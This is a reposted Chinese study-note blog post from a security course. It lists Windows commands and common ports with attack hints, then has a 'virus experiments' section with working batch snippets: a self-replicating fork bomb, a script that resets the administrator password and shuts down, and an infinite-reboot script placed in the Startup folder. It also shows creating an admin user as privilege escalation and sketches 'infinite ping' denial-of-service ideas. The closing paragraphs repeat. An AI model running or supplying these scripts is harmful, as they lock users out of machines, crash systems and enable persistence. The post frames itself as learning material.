当前位置: 首页 > news >正文

windows完结---清风

news 2024/11/4 23:34:12

windows完结

注:本文章源于泷羽SEC,如有侵权请联系我,违规必删
学习请认准泷羽SEC学习视频:https://space.bilibili.com/350329294

win7镜像下载网址

https://www.xitongku.com/

https://mirrors.tuna.tsinghua.edu.cn/

https://msdn.itellyou.cn/

windows常用命令

在网络安全的渗透测试中,有许多Windows命令非常有用。以下是三十个常用的Windows命令,适用于渗透测试:

  1. ipconfig - 查看网络配置信息。
  2. ping - 检测网络连通性。
  3. tracert - 路由跟踪,查看数据包到达目的地的路径。
  4. netstat - 显示网络连接和开放的端口。
  5. nslookup - 查询DNS记录。
  6. whoami - 显示当前用户信息。
  7. net user - 管理用户账户。
  8. net localgroup - 查看或管理本地组。
  9. tasklist - 列出当前运行的进程。
  10. taskkill - 终止指定的进程。
  11. systeminfo - 显示系统信息。
  12. wmic - 访问和管理Windows管理规范(WMI)。
  13. dir - 列出目录内容。
  14. copy - 复制文件。
  15. del - 删除文件。
  16. attrib - 查看或更改文件属性。
  17. powershell - 启动PowerShell,执行复杂命令。
  18. netsh - 配置网络接口。
  19. route - 显示和修改路由表。
  20. reg - 访问和修改注册表。
  21. schtasks - 管理计划任务。
  22. gpresult - 显示组策略结果。
  23. taskschd.msc - 打开任务计划程序。
  24. perfmon - 性能监视器。
  25. getmac - 查看MAC地址。
  26. shutdown - 关机或重启计算机。
  27. eventvwr - 打开事件查看器。
  28. cipher - 管理加密文件。
  29. chkdsk - 检查磁盘错误。
  30. powershell -exec bypass - 以绕过执行策略的方式运行PowerShell脚本。

这些命令在渗透测试和网络安全审计中非常有用,可以帮助测试人员收集信息和执行各种操作。请注意,在使用这些命令时务必遵循法律法规及道德规范。

端口信息

21 #ftp
23 #tenlnet 
80 #web #80-89可能是web
443 #ssl心脏滴血漏洞以及web漏洞测试
445 #smb
1443 #mssql
1521 #oracle
2082/2083 #cpanel 主机管理系统登陆 (国外比较多)
2222 #虚拟主机管理系统登陆(国外比较多)
3128 #squid代理默认端口-漫游内网
3306 #mysql
3312/3311 #kangle主机管理系统登陆
3389 #远程桌面
5432 #postgreSQL
5900 #vnc未授权登陆
6379 #redis(未授权)
7001.7002 #weblogic 默认弱口令,反序列化
7778 #kloxo 主机控制面板登录
8000-9090 #一些常见的web端口,运维喜欢把管理后台开在非80端口上
8080 #tomacat、wdcp主机管理系统,默认弱口令
8080,8089,9090 #jboss
8083 #vestacp 主机管理系统(国外较多)
8649 #ganlia
8888 #宝塔 主机管理默认端口
10000 #virruamin/webmin 服务器虚拟主机管理系统
11211 #memcache 未授权访问
27017 27018 #mongodb 未授权访问
28017 #mongodb 统计系统页面

windows常用命令

cd	显示当前目录的名称或将其更改
cmd		打开另一个wendows命令解释程序窗口
copy	将至少一个文件复制到另一个位置
del	删除至少一个文件
dir	显示一个目录中的文件和子目录
echo 显示消息,或者将命令回显打开或者关闭
erase	删除一个文件或者多个文件
find		在一个或者多个文件中搜索一个文本字符串
findstr	在多个文件中搜索字符串
mkdir	创建一个目录
more	逐屏显示输出
move	将一个或者多个文件从一个目录移动到另一个目录
ren	重命名文件名
rmdir	删除目录
type		显示文本内容
attrib	显示或修改文件扩展名关联
bcdedit	设置启动数据库中的属性以控制启动加载
icacls	显示或者修改文件的访问控制列表(acl)
chcp	显示或者设置活动代码页数
comp	比较两个或者两套文件的内容
date		显示或者设置日期
diskpart	显示或配置磁盘分区属性
doskey	编辑命令行,撤回Windows命令
driverquery	显示当前设备驱动程序状态和属性
fc	比较两个文件集并显示他们之间的不同
for	为一组文件中的每一个文件运行一个指定命令
fsutil	显示或者配置文件系统属性
gpresult	显示计算机或者用户的组策略信息
mklink	创建符号链接和硬链接
openfiles 显示远程用户通过文件共享打开的本地文件
path	为可执行文件显示或者设置搜索路径
set	显示 设置 或删除windows环境变量
schtasks	安排一台计算机上运行命令和程序
shutdown	允许通过本地或远程方式正确关闭计算机
start	启动单独的窗口以运行指定的程序或者命令
systeminfo	显示计算机的特定属性和配置
tasklist	显示包括服务在内的所有当前运行任务
taskkill	终止正在运行的进程或应用程序
tree	树状图
time		显示或者设置系统时间
tracert	网络路径追踪
常见的cmd命令
1.echo
echo /?(查看echo的帮助提示)
echo 1(输出1)
echo 1>1.txt (输出1并且重定向到1.txt)
echo 456789 >>1.txt (把内容追加到1.txt)
如果再用就会把文件覆盖掉2.dir(展示当前目录的文件)3.d: c:等和cd
d:(切换到d盘)
cd.(进入当前目录)
cd..(回退到上一级目录)
cd /文件夹
cd desktop(切换到桌面)4.tree(文件树状图、在内网比较常用)
tree /?(查看帮助文档)
/f(显示每个文件夹中的名称)
/a(使用ascii字符,而不使用扩展字符)
tree C:\users\administrator /f
tree C:\users\administrator /a
(在渗透测试中比较常用)5.md创建目录和rd删除目录
md是mkdir的缩写(作用一样)
md kkk (在当前目录创建名为kkk的文件夹)
rd kkk(删除kkk文件夹)
tab补全功能6.ipconfig
查看网络本机ip地址
ipconfig /all(把所有的网络信息打印出来)7.cls(清屏)8.copy(复制拼接文件)
copy /?(查看帮助文档)
copy 1.txt ..\1.txt(把文件1.txt复制到上一级目录)
先利用cd..回退到上一级目录再利用dir命令查看
copy 1.txt desktop\2.txt
(把admin文件夹中的1.txt复制到桌面并重命名2.txt)
和echo配合使用
echo 123>1.txt 
再echo 456>2.txt
copy 1.txt+2.txt>3.txt9.move(文件移动)
move ..\1.txt 4.txt(把上一级目录中的1.txt移动到本级目录,并且重命名4.txt)10.ren(重命名)
ren 4.txt 5.txt(把4.txt改名为5.txt)11.del(删除)
del 1.txt 2.txt 3.txt(永久删除不会进入回收站)12.ping(一般用于探测主机ip是否存活)
ping /?(查看帮助文档)
-t(一直ping)13.type(显示文本文件的内容)
echo sdafasdfasdfa>>1.txt
type 1.txt(查看文件内容)14.reg(注册表)
reg /?(查看帮助文档)15.nslookup(探测域名信息)
nslookup www.baidu.com
nslookup -d www.baidu.com(查看历史解析记录)16.find(查找)
find /?(帮助文档)
先在1.txt中输入各种字符串,find "a" 1.txt(在1.txt中查找带a的字段)
find /n "a" 1.txt(查找a参数的字段并排序行号)
type跟find结合使用 使用type 1.txt | find "a"(查看带有a参数的字段)
type 1.txt | find "a" /n(查看1.txt的内容并输出a参数的字段并排序)17.tasklist(任务列表 显示进程的名称信息)18.taskkill(杀死进程)
taskkill /?(帮助文档)
-pid -f -t
taskkill /pid 2824 杀死进程
遇到杀不掉的进程加一个/f参数即可19.ver、winver(显示版本)20.start(启动 开始命令)
start cmd(打开cmd)
start calc(打开计算器)
start ping www.baidu.com -t21.systeminfo(查看整个系统信息)
查看一些比较重要的信息 补丁信息,后期提权就是针对一些不同的修补进程,用于内网渗透22.logoff(注销)
先logoff /?(帮助文档)
logoff(注销 提权情况下进行3389 的连接桌面的话,有可能机器是连接状态,我们要利用这个命令把对方的远程登录注销)23.shutdown(关机)/s /f /t /a /r /g /l
shutdown /?(帮助文档)
参数很多
shutdown /s(在一分钟内关机)
shutdown /a(计划取消)
shutdown /r(重启)
shutdown /g (在一分钟内关机)
shutdown /r /t 0 (/t设置时间 设置0立即执行)24.telnet(协议工具)
控制面板->程序->打开或关闭windows功能->telnet客户端
telnet(之前在shodan中 思科的设备就是基于这个)25.arp(自己ip和物理机的影射关系表)
arp /?(帮助文档)
arp /a(拿到内网机器后通过这个命令可以有助于横向移动,用于发现同一网络有哪些主机)26.at(定时任务)
定时关机 at 时间 "shutdown /s /r /t 0"
at "shutdown /r /t 0"
取消命令 at 1 /delete27.net(服务)
net stop telnet(关闭telnet)
net start telnet(打开telnet)
net user(看当前用户)
net user admin 123 /add (添加用户名admin 密码为123的用户)
net user admin (查看admin用户名权限)
net user administrator(查看管理员用户权限)
怎么把admin变成管理员权限
net localgroup administrator admin /add(提权)
net user admin (查看admin用户权限)
net user admin (删除用户)

病毒实验

1.资源耗尽病毒

资源耗尽的bat病毒

代码核心
echo start cmd >1.txt
echo %0 >>1.txt 
ren 1.txt 1.bat
========================
start cmd %0    #核心
=======================
同样可以 %0|%0 #加快速度

start ping 127.0.0.1
%0start md 111 
%0

解读

这是利用递归吃系统的方法。
%号是否应该是$,$0表示脚本命令本身。所以就是调用自己并通过管道开启子进程。即2的指数倍繁衍。1变2,2变4,
换句话说$0也可以死机。只不过慢点。

演示:

外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传

2.锁机病毒

echo net user administrator 123456 >c:\windows\Temp\1.bat
echo shutdown /s /t 0 >>c:\windows\Temp\1.bat

演示

外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传

外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传

外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传

外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传

3.无限重启病毒

echo shutdown /s /t 0 > c:\windows\Temp\2.bat
copy c:\windows\Temp\2.bat   "%USERPROFILE%\AppDate\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\"
====================
powershell中
echo shutdown /s /t 0 > c:\windows\Temp\2.bat
copy c:\windows\Temp\2.bat "$env:USERPROFILE\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\"

演示

外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传

4.windows系统目录接管与渗透关系

"%USERPROFILE%\AppData\Roaming\Microsoft\windows\Start\Menu\Programs\Startup\"(开机自启目录)
==================================
c:\windows\Temp\1.bat (重启自动清空缓存)

5.扩展

病毒思路

windows系统写病毒的最好语言,就是它的原生语言
泷哥:记住了 病毒 任何语言  都比不过系统本身自带语言的伤害大

无限DDos思路、无限ping、利用ping+无限自启+目标ip=无限ping、无限启动计算机、无限创造文件夹、

无限重启病毒理解
设置重启时间为0秒,同时将病毒复制系统Windows的启动目录,当你启动时自动启动,立马关机,实现无限关机

泷哥语录:

1.
@所有人   还记得我说的话吗  不要区分任何技术的名称  我们要了解本质
懂得底层原理
你就可以创造
2.
你先去看课  与其天天想面试  不如去实战打src刷榜练级
你冲榜啊   特么你到榜一谁敢不要你?
别焦虑   考证   学习   不是一两年没工作你就会死
一直没有技术才会死



无限DDos思路、无限ping、利用ping+无限自启+目标ip=无限ping、无限启动计算机、无限创造文件夹、无限重启病毒理解
设置重启时间为0秒,同时将病毒复制系统Windows的启动目录,当你启动时自动启动,立马关机,实现无限关机## 泷哥语录:

@所有人  还记得我说的话吗 不要区分任何技术的名称 我们要了解本质
懂得底层原理
你就可以创造
2.
你先去看课 与其天天想面试 不如去实战打src刷榜练级
你冲榜啊 特么你到榜一谁敢不要你?
别焦虑 考证 学习 不是一两年没工作你就会死
一直没有技术才会死

http://www.mrgr.cn/news/65637.html

相关文章:

  • 信息安全工程师(74)网络安全风险评估技术方法与工具
  • 【JAVA】第3关:素数链
  • stm32cubeIde 使用笔记
  • el-talble selection行 初始默认勾选
  • 【jvm】为什么Xms和Xmx的值通常设置为相同的?
  • 深入计算机语言之C++:模板初阶
  • 数据结构---自定义动态数组
  • 从零开发操作系统-为什么磁盘的扇区为 512 byte
  • PMP-人
  • 泛微开发修炼之旅--52关于ecology首页待办修改源码位置记录
  • C#:强大而优雅的编程语言
  • 书签管理工具使用技巧
  • H265编码丢帧问题分析
  • Java-I/O框架10:File类、文件操作
  • 关于LIMS实验室管理系统常见的几个误区
  • 多个锚点定位时的锚点优选方法(附公式和MATLAB代码讲解)
  • CSP 2024 入门级第二轮 CSP-J 2024 复赛 第一题 扑克牌
  • 路径跟踪之导航向量场(三)——无奇异点导航向量场
  • 弹性布局flex-direction
  • 知识图谱论文分享
  • 指针(c语言)
  • gulp入门教程9:lastRun
  • [算法初阶]第二集 滑动窗口(已完结)
  • 宠物空气净化器是不是智商税?真实测试热门品牌!哪款除毛好?
  • 在VScode中配置C_C++环境
  • ROS2 单帧Pcd转多帧节点 录制Bag